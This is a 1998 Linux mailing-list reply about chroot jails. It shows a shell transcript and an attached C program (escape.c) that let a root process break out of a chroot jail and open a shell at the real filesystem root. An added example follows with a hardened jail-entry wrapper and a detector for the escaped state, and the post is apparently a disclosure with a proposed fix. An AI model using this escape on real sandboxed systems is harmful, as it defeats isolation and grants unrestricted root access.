RE: Chroot breach in 2.1.100+

Jeremy Fitzhardinge (jsgf@sirius.com)
Sun, 20 Sep 1998 22:47:05 -0700 (PDT)


On 20-Sep-98 Alexander Viro wrote:
>
> In some cases chroot jail can be broken by process with UID==0.

Yes, you can do it trivially and portably, without relying on any special Linux
features:

# # set up chroot env
# cd chroot-jail
# chroot .
# pwd
/
# mkdir foo
# chroot foo
# # note, chroot does *not* change cwd
# cd ../../../../../..
# chroot .
# # now we're at real /

If you want to fix this, you make sure chroot also does a chdir. At the moment
the chroot syscall allows a process to have a cwd which is outside of the tree
based at its /. Even if you fix this, you can still use all the other attacks.

J

Attachment: escape.c

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/stat.h>
#include <errno.h>

/* Report the failing call and give up. Returns int so it can sit on the
 * right-hand side of "call() == 0 || barf(...)". */
int barf(const char *msg)
{
    perror(msg);
    exit(1);
}

int main(void)
{
    struct stat dot, dotdot;

    /* Make a directory below the current "/" (the jail we are in) and
     * chroot into it *without* chdir'ing: cwd is now outside the new root. */
    chdir("/");
    mkdir("tmp", 01777);
    chroot("tmp") == 0 || barf("chroot tmp");

    stat(".", &dot) == 0 || barf("stat .");

    /* Walk ".." until it stops moving. Because cwd lies outside the new
     * root, the kernel never clamps the walk at that root, so it ends at
     * the real filesystem root, where ".." refers to "." itself. */
    for (;;) {
        stat("..", &dotdot) == 0 || barf("stat ..");

        if (dot.st_dev == dotdot.st_dev &&
            dot.st_ino == dotdot.st_ino)
            break;
        dot = dotdot;
        chdir("..") == 0 || barf("chdir ..");
    }

    /* Make the real root our root again and hand over a shell there. */
    chroot(".") == 0 || barf("chroot .");

    execl("/bin/sh", "/bin/sh", (char *)NULL) == 0 || barf("exec");
    exit(1);
}
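Added example, not part of Jeremy's message or his escape.c: the "chroot also does a chdir" fix from above, written as a wrapper that also drops root so the process can no longer call chroot() at all, plus the same ".." walk used by the escape turned into a self-check that reports whether the cwd is actually inside the current "/". The names enter_jail() and cwd_under_root() are my own; only POSIX calls are used. The jail directory and uid/gid on the command line are whatever you pass in.

```c
/* Added example (not from the original post): a chroot wrapper that does
 * what the post says the syscall does not (chdir into the jail), plus a
 * detector for the "cwd outside the tree based at /" state. */
#include <errno.h>
#include <fcntl.h>
#include <grp.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Two stat results name the same directory iff device and inode match. */
static int same_file(const struct stat *a, const struct stat *b)
{
    return a->st_dev == b->st_dev && a->st_ino == b->st_ino;
}

/* Walk ".." from the cwd until it stops moving and compare that topmost
 * ancestor with "/". Returns 1 if cwd is under our root, 0 if it is outside
 * it (the state "chroot foo" without a chdir leaves you in), -1 on error.
 * The cwd is saved and restored so the caller is not moved. */
int cwd_under_root(void)
{
    struct stat root, here, up;
    int saved = open(".", O_RDONLY);
    int result = -1;

    if (saved < 0 || stat("/", &root) != 0 || stat(".", &here) != 0)
        goto out;
    for (;;) {
        if (stat("..", &up) != 0)
            goto out;
        if (same_file(&here, &up))      /* ".." == "." only at a root */
            break;
        here = up;
        if (chdir("..") != 0)
            goto out;
    }
    result = same_file(&here, &root);
out:
    if (saved >= 0) {
        fchdir(saved);
        close(saved);
    }
    return result;
}

/* Enter `dir` as a jail: chdir into it first, chroot("."), chdir("/") so
 * cwd is provably the new root, then drop to uid/gid so chroot() and
 * mknod() are gone for good. Returns 0 on success, -1 with errno set.
 * Needs root to get past chroot(). */
int enter_jail(const char *dir, uid_t uid, gid_t gid)
{
    if (chdir(dir) != 0)
        return -1;
    if (chroot(".") != 0)
        return -1;
    if (chdir("/") != 0)
        return -1;
    if (setgroups(0, NULL) != 0)
        return -1;
    if (setgid(gid) != 0 || setuid(uid) != 0)
        return -1;
    /* Verify the drop actually happened: regaining root must now fail. */
    if (uid != 0 && setuid(0) == 0) {
        errno = EPERM;
        return -1;
    }
    return 0;
}

int main(int argc, char **argv)
{
    printf("cwd under root before: %d\n", cwd_under_root());
    if (argc > 3) {
        /* argv: <jaildir> <uid> <gid>; run as root to see the jail entered. */
        if (enter_jail(argv[1], (uid_t)atoi(argv[2]), (gid_t)atoi(argv[3])) != 0) {
            perror("enter_jail");
            return 1;
        }
        printf("cwd under root after: %d\n", cwd_under_root());
    }
    return 0;
}
```

Run it once as root with a jail directory and an unprivileged uid/gid and the second line prints 1; run the post's transcript instead (chroot foo without cd) and cwd_under_root() reports 0 from inside that state, because the ".." walk reaches a root that is not the one "/" resolves to. On Linux the dev/inode comparison is what makes this work; bind mounts of the same directory compare equal, which is the right answer here.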
